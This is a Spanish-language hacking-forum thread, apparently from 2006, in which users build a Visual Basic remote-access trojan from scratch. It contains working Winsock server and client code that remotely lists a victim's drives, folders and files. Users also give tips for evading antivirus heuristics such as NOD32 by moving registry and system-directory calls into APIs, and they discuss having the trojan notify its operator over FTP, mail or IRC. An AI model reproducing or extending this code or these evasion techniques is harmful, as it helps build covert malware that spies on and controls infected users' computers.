Tema destacado: Últimos eventos sobre seguridad/inseguridad
Autor
|
Tema: troyano en vb desde CERO, INDICE de contenidos en la primera pagina, GranManual (Leído 112,435 veces)
|
pamela02
|
Me referia a la inyeccion de codigo para saltar los firewall (no el de windows XP).
|
|
|
|
|
|
|
|
|
Rudy21
Rudy21 Web Design
|
JAJAJAJAJAJAJA  tanto esfuerzo para que? termine de hacer mi troyan todo perfect excepto por algo Me lo eliminio el Antivirus jojoj y me dice que link.vbs o algo asi pero no pude copilar el Server jjajajajajajaja todo mi trabajo a la basura jajajajajaja salu2 
|
|
|
|
|
|
|
|
|
-Xenon-
Spectrum 128k
|
exagerado, solo tienes que modificar algunas cosas, sobre todo, la creacion de la clave del registro, hacerlo con apis, y obtener el directorio del sistema tambien con apis, eso y poco mas y es indetectable
|
|
|
|
|
|
Cuando el ingenio se queda pequeño, No basta con poner empeño, Solo el talento consigue el diseño
|
|
|
Kizar
kizar_net
|
si no kieres k la heuristica de el nod32 te le detecte en el form load no puedes poner ninguna funcion k kree una clave en el registro.
Salu2
|
|
|
|
|
|
|
|
|
franky231
|
yo no se si me pasara a mi solo o a mas gente y tampoco lo e mirao xk son 30 paginas xD,, asik si alguien me ayuda... use el codigo d scugat d la pagina 11 para ver las unidades, carpetas y archivos y funciona bien pero el problema esk si le das a disco C: solo se muestran las carpetas y los archivos de la ruta donde esta el servidor,, se puede solucionar esto para k cuando seleccionas la unidad C: salga directamente en la raiz, donde sale lo d archivos de programa,windows y todo eso Salu2
|
|
|
|
|
|
|
|
|
-Xenon-
Spectrum 128k
|
joder ahora no lo recuerdo bien, ami tambien me paso hace bastante tiempo, con mi propio codigo, y lo solucione ( me parece ) indicandole asi: c:\ el directorio de c, quiero decir, me parece que el programa enviaba solo como ruta: "c:" y habia que ponerle la barra al final \ , no me acuerdo creo que era eso, o que habia que usar otra propiedad del objeto drive1, pruebalo, mira aver si es eso, y si no postea el codigo en un momentin y te lo digo mas seguro
|
|
|
|
|
|
Cuando el ingenio se queda pequeño, No basta con poner empeño, Solo el talento consigue el diseño
|
|
|
franky231
|
pues pongo el codigo del server k es donde tiene k estar el problema Private Sub WSCAR_DataArrival(ByVal bytesTotal As Long) Dim DCar As String WSCAR.GetData DCar If Mid(DCar, 1, 6) = "\rutad" Then Call rutad(Mid(DCar, 7)) End Sub y aora el rutad k es donde debe de estar el fallo Public Function rutad(ruta As String) On Error GoTo Error If ruta = "" Then For i = 0 To Drive1.ListCount - 1 WSCAR.SendData "\list" & Drive1.List(i) Call Sleep(200) Next Else Dir1.path = ruta For i = 0 To Dir1.ListCount - 1 WSCAR.SendData "\list" & Dir1.List(i) Call Sleep(200) Next Form1.File1.path = ruta For i = 0 To Form1.File1.ListCount - 1 WSCAR.SendData "\list" & File1.path & File1.List(i) Call Sleep(200) Next End If Exit Function Error: End Function
|
|
|
|
« Última modificación: 14 Enero 2006, 12:08 por franky231 »
|
|
|
|
|
-Xenon-
Spectrum 128k
|
no me has hecho caso?, pon un msgbox ruta en la funcion, para saber si cuando envias c:\, es eso lo que recibe dir1.path , haz eso, joder, si el problema es que envias c:\, y no te devuelve ese path, si no el path en donde esta la aplicacion, tendras que mirar lo primero eso,para ver si es correcto, y yo creo que va a ser eso, que te saldra c: en vez de c:\ MIRALO
|
|
|
|
|
|
|
|
|
franky231
|
si sale C: en vez de C:\
|
|
|
|
|
|
|
|
|
-Xenon-
Spectrum 128k
|
pues eso era, haz que al mandarle el directorio como path, añada antes de enviarlo la p**a "\"
|
|
|
|
|
|
|
|
|
|
Rey11
|
Pequeño manual para obtener las carpetas y ficheros de un ordenador remoto en una carpeta determinada. Se necesita un listbox dirbox y un drive Private Sub Dir1_Change() 'Si cambia el directorio cambia los fichero que hay en el File1 = Dir1 End Sub
Private Sub Drive1_Change() 'Si cambia la unidad cambia la carpetas que hay en ellas Dir1 = Drive1 End Sub Private Sub Winsock1_OnDataArrival(ByVal bytesTotal As Long) winsock1.getdata mensaje If Mid(mensaje, 1, 3) = "lis" Then ' Si los 3 primeros caracteres son lis ruta = Mid(mensaje, 5) listar ruta 'Llamamos a la función para listar los ficheros de esa unidad y carpeta End If end sub Function listar(sitio) On Error GoTo er Dir1.Path = sitio Dir1.Refresh For i = 0 To Dir1.ListCount - 1 'esto dice las carpetas que hay en el directorio Espera 50 'Ponemos un tiempo de espera para que al enviar los datos no se cualgue winsock1.senddata "<" & Dir1.List(i) & ">" 'Ponemos <directorio> para indetificar que es una carpeta Next File1.Refresh For i = 0 To File1.ListCount - 1 'esto dice los ficheros que hay en el directorio Espera 50 ' Lo mismo que en lo anterior winsock1.senddata "f" & File1.List(i) 'ponemos f al principio para indicar que es un fichero Next GoTo fin er: enviar "e" fin:
End Function Public Function Espera(MiliSegundos As Single) 'Función que me dejo lympex para que se pueda esperar un tiempo x; o sea un sleep Dim ComienzoSeg As Single Dim FinSeg As Single ComienzoSeg = Timer FinSeg = ComienzoSeg + (MiliSegundos / 1000) Do While FinSeg > Timer DoEvents If ComienzoSeg > Timer Then FinSeg = FinSeg - 24 * 60 * 60 End If Loop End Function Y luego en el cliente: Private Sub Command3_Click() winsock1.senddata "lis " & Text8.Text 'el text8 se corresponde con la ruta List1.Clear End Sub Private Sub Ws_DataArrival(ByVal bytesTotal As Long) winsock1.getddata mensaje If Mid(mensaje, 1, 1) = "<" Then mensaje = Mid(mensaje, 1, Len(mensaje) - 2) List1.AddItem mensaje mensaje = "" End If If Mid(mensaje, 1, 1) = "f" Then
mensaje = Mid(mensaje, 2, Len(mensaje) - 3) List1.AddItem mensaje mensaje = "" End If end sub Esto se tiene que enviar: lis c:\ Y entonces el otro va respondiendo: <c:\carpeta> <c:\carpeta2> farchivo.ext farchivo2.ext Saludos y que hos sea útil 
|
|
|
|
« Última modificación: 14 Enero 2006, 16:53 por Rey11 »
|
|
|
|
|
|
|
TheCrash
|
se podria hacer que el troyano notifique por ftp ? disculpen pero no tengo mucha edea en vb y no sabria ahcer el codigo. desde ya mcuhas gracias. salu2
|
|
|
|
|
|
|
|
|
SheKeL_C$
_-=[Sh3K3L_C$]=-_
|
el q t notifiq por ftp es algo q puedes llegar a tardar mucho mas pork tienes q mirarlo cada vez q t acuerdes, mejor q lo agas por irc q t lo explica muy bien en la 1 o 2 pagina
si todavia quieres utilizar el ftp, dale al boton buscar o sino luego digo el post en q lo explicaban
|
|
|
|
|
|
|
|
|
TheCrash
|
si es verdad. pero lo que apsa es que no peudo hacer q me funcione la notificacion por mail ... ahroa voya ver la del mirc. gracias, si laguien tiene algun tipo de notificacion que no se la SIN se los agracdeseria. salu2
|
|
|
|
|
|
|
|
|
|
|